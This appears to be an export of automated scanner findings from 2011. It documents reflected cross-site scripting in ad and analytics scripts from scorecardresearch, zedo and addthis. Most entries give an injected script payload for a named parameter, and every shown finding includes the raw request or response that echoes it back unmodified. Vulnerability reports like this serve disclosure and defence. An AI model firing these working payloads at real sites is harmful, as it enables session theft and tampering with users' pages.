/*global document, window, escape */ var agt = window.navigator.userAgent.toLowerCase(); var opera = agt.indexOf('opera') !== -1; var ie = agt.indexOf('msie') !== -1; var ns = window.navigator.app ...[SNIP]... <param name="movie" value="http://04e77fc8cc74396e5f52b887dd10171a-quova13006323844d861340674da13dbd';alert(1)//5b2336207c5.assets.truvie.com/movie.swf?q=partner_key%3D04e77fc8cc74396e5f52b887dd10171a%26token%3Dquova13006323844d861340674da13dbd%2527%253Balert%25281%2529%252F%252F5b2336207c5&port=443&host=04e77fc8cc74396e5f ...[SNIP]...
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload a04ba<script>alert(1)</script>d250a5589a3 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3a04ba<script>alert(1)</script>d250a5589a3&c2=6035155&c3=5119479&c4=41005094&c5=57956784&c6=& HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N4568.TribalFusionAdNetwork/B5119479.5;sz=300x250;click=http://a.tribalfusion.com/h.click/a2mOvJmdIyUdJ6XF3dYrYg1a6NRbBDWUZbXVH32orJqPF7rYTFq5Eje4ar2oEMA1FF6TtjXmAbJnc3omHnA2qMh2HAy5PFGpbYEYsfSXcMV0VvvmErP5Un4VrnEWPYTPTU0PsQsStFNYHbsVmYN2cBWXrnZcVAau2AYaPPMKPaQE7iMjZdB/;ord=1247147914? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 27 Mar 2011 17:26:42 GMT Date: Sun, 20 Mar 2011 17:26:42 GMT Connection: close Content-Length: 3603
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 3a577<script>alert(1)</script>f0467ef660e was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=60351553a577<script>alert(1)</script>f0467ef660e&c3=5119479&c4=41005094&c5=57956784&c6=& HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N4568.TribalFusionAdNetwork/B5119479.5;sz=300x250;click=http://a.tribalfusion.com/h.click/a2mOvJmdIyUdJ6XF3dYrYg1a6NRbBDWUZbXVH32orJqPF7rYTFq5Eje4ar2oEMA1FF6TtjXmAbJnc3omHnA2qMh2HAy5PFGpbYEYsfSXcMV0VvvmErP5Un4VrnEWPYTPTU0PsQsStFNYHbsVmYN2cBWXrnZcVAau2AYaPPMKPaQE7iMjZdB/;ord=1247147914? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 27 Mar 2011 17:26:42 GMT Date: Sun, 20 Mar 2011 17:26:42 GMT Connection: close Content-Length: 3603
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload b855a<script>alert(1)</script>1d3b5ae5845 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=6035155&c3=5119479b855a<script>alert(1)</script>1d3b5ae5845&c4=41005094&c5=57956784&c6=& HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N4568.TribalFusionAdNetwork/B5119479.5;sz=300x250;click=http://a.tribalfusion.com/h.click/a2mOvJmdIyUdJ6XF3dYrYg1a6NRbBDWUZbXVH32orJqPF7rYTFq5Eje4ar2oEMA1FF6TtjXmAbJnc3omHnA2qMh2HAy5PFGpbYEYsfSXcMV0VvvmErP5Un4VrnEWPYTPTU0PsQsStFNYHbsVmYN2cBWXrnZcVAau2AYaPPMKPaQE7iMjZdB/;ord=1247147914? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 27 Mar 2011 17:26:42 GMT Date: Sun, 20 Mar 2011 17:26:42 GMT Connection: close Content-Length: 3603
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload ae805<script>alert(1)</script>db104d8ffcd was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=6035155&c3=5119479&c4=41005094ae805<script>alert(1)</script>db104d8ffcd&c5=57956784&c6=& HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N4568.TribalFusionAdNetwork/B5119479.5;sz=300x250;click=http://a.tribalfusion.com/h.click/a2mOvJmdIyUdJ6XF3dYrYg1a6NRbBDWUZbXVH32orJqPF7rYTFq5Eje4ar2oEMA1FF6TtjXmAbJnc3omHnA2qMh2HAy5PFGpbYEYsfSXcMV0VvvmErP5Un4VrnEWPYTPTU0PsQsStFNYHbsVmYN2cBWXrnZcVAau2AYaPPMKPaQE7iMjZdB/;ord=1247147914? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 27 Mar 2011 17:26:42 GMT Date: Sun, 20 Mar 2011 17:26:42 GMT Connection: close Content-Length: 3603
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 40c75<script>alert(1)</script>d0c790edaba was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=6035155&c3=5119479&c4=41005094&c5=5795678440c75<script>alert(1)</script>d0c790edaba&c6=& HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N4568.TribalFusionAdNetwork/B5119479.5;sz=300x250;click=http://a.tribalfusion.com/h.click/a2mOvJmdIyUdJ6XF3dYrYg1a6NRbBDWUZbXVH32orJqPF7rYTFq5Eje4ar2oEMA1FF6TtjXmAbJnc3omHnA2qMh2HAy5PFGpbYEYsfSXcMV0VvvmErP5Un4VrnEWPYTPTU0PsQsStFNYHbsVmYN2cBWXrnZcVAau2AYaPPMKPaQE7iMjZdB/;ord=1247147914? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 27 Mar 2011 17:26:42 GMT Date: Sun, 20 Mar 2011 17:26:42 GMT Connection: close Content-Length: 3603
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 241f7<script>alert(1)</script>0ecb1669f4b was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=6035155&c3=5119479&c4=41005094&c5=57956784&c6=241f7<script>alert(1)</script>0ecb1669f4b& HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N4568.TribalFusionAdNetwork/B5119479.5;sz=300x250;click=http://a.tribalfusion.com/h.click/a2mOvJmdIyUdJ6XF3dYrYg1a6NRbBDWUZbXVH32orJqPF7rYTFq5Eje4ar2oEMA1FF6TtjXmAbJnc3omHnA2qMh2HAy5PFGpbYEYsfSXcMV0VvvmErP5Un4VrnEWPYTPTU0PsQsStFNYHbsVmYN2cBWXrnZcVAau2AYaPPMKPaQE7iMjZdB/;ord=1247147914? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 27 Mar 2011 17:26:42 GMT Date: Sun, 20 Mar 2011 17:26:42 GMT Connection: close Content-Length: 3603
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 214c7'%3balert(1)//3be38b6ab7b was submitted in the $ parameter. This input was echoed as 214c7';alert(1)//3be38b6ab7b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /bar/v16-403/d3/jsc/fm.js?c=54/50/49&a=0&f=&n=1219&r=13&d=94&q=&$=214c7'%3balert(1)//3be38b6ab7b&s=1&z=0.18005222734063864 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.alexa.com/siteinfo/xss.cx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDX=29; ZEDOIDA=jhmxpQoBADYAAET@BzgAAAAW~022111; __qca=P0-1757581032-1298497085187; FFChanCap=1512B1025,1#775797#834300#580897:1083,2#647866,8#647871,7#740741,22#647878,20#647876,17#740739#668672#648495,21#668688#831213:305,944#913010|0,1,1:0,2,2:0,1,1:0,19,1:0,19,1:0,33,15:0,19,1:0,19,1:0,33,15:0,20,2:0,19,1:0,20,2:0,19,1:0,24,1; PI=h749620Za805982Zc305002290%2C305002290Zs788Zt175; FFCap=1512B933,196008:1025,196206:598,169775|0,24,1:0,1,1:1,11,1; FFgeo=5386156; ZFFAbh=792B826,20|695_792#365Z1083_806#379Z1585_806#379Z798_807#380
Response (redirected)
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1219:214c7';alert(1)//3be38b6ab7b;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1219,54,94;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "823f84fd-80e3-49ea762bb1f00" Vary: Accept-Encoding X-Varnish: 1854305258 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=84 Expires: Sun, 20 Mar 2011 17:16:05 GMT Date: Sun, 20 Mar 2011 17:14:41 GMT Connection: close Content-Length: 895
// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat=',214c7';alert(1)//3be38b6ab7b';var zzCustom='';var zzTitle=''; if(typeof zzStr=='undefined'){ var zzStr="q=,214c7';alert(1)//3be38b6ab7b;z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6583d"%3balert(1)//b046b0d6fdc was submitted in the $ parameter. This input was echoed as 6583d";alert(1)//b046b0d6fdc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /bar/v16-403/d3/jsc/fm.js?c=54/50/49&a=0&f=&n=1219&r=13&d=94&q=&$=6583d"%3balert(1)//b046b0d6fdc&s=1&z=0.18005222734063864 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.alexa.com/siteinfo/xss.cx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDX=29; ZEDOIDA=jhmxpQoBADYAAET@BzgAAAAW~022111; __qca=P0-1757581032-1298497085187; FFChanCap=1512B1025,1#775797#834300#580897:1083,2#647866,8#647871,7#740741,22#647878,20#647876,17#740739#668672#648495,21#668688#831213:305,944#913010|0,1,1:0,2,2:0,1,1:0,19,1:0,19,1:0,33,15:0,19,1:0,19,1:0,33,15:0,20,2:0,19,1:0,20,2:0,19,1:0,24,1; PI=h749620Za805982Zc305002290%2C305002290Zs788Zt175; FFCap=1512B933,196008:1025,196206:598,169775|0,24,1:0,1,1:1,11,1; FFgeo=5386156; ZFFAbh=792B826,20|695_792#365Z1083_806#379Z1585_806#379Z798_807#380
Response (redirected)
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1219:6583d";alert(1)//b046b0d6fdc;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1219,54,94;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "823f84fd-80e3-49ea762bb1f00" Vary: Accept-Encoding X-Varnish: 1854305258 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=85 Expires: Sun, 20 Mar 2011 17:16:05 GMT Date: Sun, 20 Mar 2011 17:14:40 GMT Connection: close Content-Length: 895
// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat=',6583d";alert(1)//b046b0d6fdc';var zzCustom='';var zzTitle=''; if(typeof zzStr=='undefined'){ var zzStr="q=,6583d";alert(1)//b046b0d6fdc;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5abb7"%3balert(1)//4ceb5a9102f was submitted in the q parameter. This input was echoed as 5abb7";alert(1)//4ceb5a9102f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /bar/v16-403/d3/jsc/fm.js?c=54/50/49&a=0&f=&n=1219&r=13&d=94&q=5abb7"%3balert(1)//4ceb5a9102f&$=&s=1&z=0.18005222734063864 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.alexa.com/siteinfo/xss.cx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDX=29; ZEDOIDA=jhmxpQoBADYAAET@BzgAAAAW~022111; __qca=P0-1757581032-1298497085187; FFChanCap=1512B1025,1#775797#834300#580897:1083,2#647866,8#647871,7#740741,22#647878,20#647876,17#740739#668672#648495,21#668688#831213:305,944#913010|0,1,1:0,2,2:0,1,1:0,19,1:0,19,1:0,33,15:0,19,1:0,19,1:0,33,15:0,20,2:0,19,1:0,20,2:0,19,1:0,24,1; PI=h749620Za805982Zc305002290%2C305002290Zs788Zt175; FFCap=1512B933,196008:1025,196206:598,169775|0,24,1:0,1,1:1,11,1; FFgeo=5386156; ZFFAbh=792B826,20|695_792#365Z1083_806#379Z1585_806#379Z798_807#380
Response (redirected)
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=0;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1219,54,94;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "823f84fd-80e3-49ea762bb1f00" Vary: Accept-Encoding X-Varnish: 1854305258 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=88 Expires: Sun, 20 Mar 2011 17:16:05 GMT Date: Sun, 20 Mar 2011 17:14:37 GMT Connection: close Content-Length: 892
// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat='5abb7";alert(1)//4ceb5a9102f';var zzCustom='';var zzTitle=''; if(typeof zzStr=='undefined'){ var zzStr="q=5abb7";alert(1)//4ceb5a9102f;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17174'%3balert(1)//3005c8f29eb was submitted in the q parameter. This input was echoed as 17174';alert(1)//3005c8f29eb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /bar/v16-403/d3/jsc/fm.js?c=54/50/49&a=0&f=&n=1219&r=13&d=94&q=17174'%3balert(1)//3005c8f29eb&$=&s=1&z=0.18005222734063864 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.alexa.com/siteinfo/xss.cx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDX=29; ZEDOIDA=jhmxpQoBADYAAET@BzgAAAAW~022111; __qca=P0-1757581032-1298497085187; FFChanCap=1512B1025,1#775797#834300#580897:1083,2#647866,8#647871,7#740741,22#647878,20#647876,17#740739#668672#648495,21#668688#831213:305,944#913010|0,1,1:0,2,2:0,1,1:0,19,1:0,19,1:0,33,15:0,19,1:0,19,1:0,33,15:0,20,2:0,19,1:0,20,2:0,19,1:0,24,1; PI=h749620Za805982Zc305002290%2C305002290Zs788Zt175; FFCap=1512B933,196008:1025,196206:598,169775|0,24,1:0,1,1:1,11,1; FFgeo=5386156; ZFFAbh=792B826,20|695_792#365Z1083_806#379Z1585_806#379Z798_807#380
Response (redirected)
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=0;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1219,54,94;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "823f84fd-80e3-49ea762bb1f00" Vary: Accept-Encoding X-Varnish: 1854305258 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=87 Expires: Sun, 20 Mar 2011 17:16:05 GMT Date: Sun, 20 Mar 2011 17:14:38 GMT Connection: close Content-Length: 892
// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat='17174';alert(1)//3005c8f29eb';var zzCustom='';var zzTitle=''; if(typeof zzStr=='undefined'){ var zzStr="q=17174';alert(1)//3005c8f29eb;z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1bca3'%3balert(1)//faf01b8c8fc was submitted in the $ parameter. This input was echoed as 1bca3';alert(1)//faf01b8c8fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1219:1bca3';alert(1)//faf01b8c8fc;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1219,54,94;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFCap=1512B933,196008:1025,196206:598,169775:1219,205340|0,24,1:0,1,1:1,11,1:0,28,1;expires=Tue, 19 Apr 2011 17:14:46 GMT;path=/;domain=.zedo.com; ETag: "823f84fd-80e3-49ea762bb1f00" Vary: Accept-Encoding X-Varnish: 1854305258 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=79 Expires: Sun, 20 Mar 2011 17:16:05 GMT Date: Sun, 20 Mar 2011 17:14:46 GMT Connection: close Content-Length: 2362
// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat=',1bca3';alert(1)//faf01b8c8fc';var zzCustom='';var zzTitle=''; if(typeof zzStr=='undefined'){ var zzStr="q=,1bca3';alert(1)//faf01b8c8fc;z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2477"%3balert(1)//d617dfaf242 was submitted in the $ parameter. This input was echoed as d2477";alert(1)//d617dfaf242 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1219:d2477";alert(1)//d617dfaf242;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1219,54,94;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "823f84fd-80e3-49ea762bb1f00" Vary: Accept-Encoding X-Varnish: 1854305258 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=79 Expires: Sun, 20 Mar 2011 17:16:05 GMT Date: Sun, 20 Mar 2011 17:14:46 GMT Connection: close Content-Length: 895
// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat=',d2477";alert(1)//d617dfaf242';var zzCustom='';var zzTitle=''; if(typeof zzStr=='undefined'){ var zzStr="q=,d2477";alert(1)//d617dfaf242;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c1a7"%3balert(1)//814717ee126 was submitted in the q parameter. This input was echoed as 7c1a7";alert(1)//814717ee126 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFCap=1512B933,196008:1025,196206:598,169775:1219,205340|0,24,1:0,1,1:1,11,1:0,28,1;expires=Tue, 19 Apr 2011 17:14:39 GMT;path=/;domain=.zedo.com; Set-Cookie: FFcat=1219,54,94;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "823f84fd-80e3-49ea762bb1f00" Vary: Accept-Encoding X-Varnish: 1854305258 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=86 Expires: Sun, 20 Mar 2011 17:16:05 GMT Date: Sun, 20 Mar 2011 17:14:39 GMT Connection: close Content-Length: 2359
// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat='7c1a7";alert(1)//814717ee126';var zzCustom='';var zzTitle=''; if(typeof zzStr=='undefined'){ var zzStr="q=7c1a7";alert(1)//814717ee126;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload adc03'%3balert(1)//0a54ecf6cff was submitted in the q parameter. This input was echoed as adc03';alert(1)//0a54ecf6cff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFCap=1512B933,196008:1025,196206:598,169775:1219,205491|0,24,1:0,1,1:1,11,1:0,28,1;expires=Tue, 19 Apr 2011 17:14:39 GMT;path=/;domain=.zedo.com; Set-Cookie: FFcat=1219,54,94;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "823f84fd-80e3-49ea762bb1f00" Vary: Accept-Encoding X-Varnish: 1854305258 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=86 Expires: Sun, 20 Mar 2011 17:16:05 GMT Date: Sun, 20 Mar 2011 17:14:39 GMT Connection: close Content-Length: 2357
// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat='adc03';alert(1)//0a54ecf6cff';var zzCustom='';var zzTitle=''; if(typeof zzStr=='undefined'){ var zzStr="q=adc03';alert(1)//0a54ecf6cff;z="+Math.random();}
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e3842<script>alert(1)</script>959784cc53a was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /red/psi/sites/seo101.co/p.json?callback=_ate.ad.hpre3842<script>alert(1)</script>959784cc53a&uid=4d5af32c71c2e1a5&url=http%3A%2F%2Fseo101.co%2Fxss.cxc5cde%253C%2Ftitle%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E79857da5316&ref=http%3A%2F%2Fburp%2Fshow%2F8&yvtht3 HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh35.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1300446510.66|1300446510.60|1300446510.1FE|1299801259.19A; dt=X; psc=4; uid=4d5af32c71c2e1a5
Response
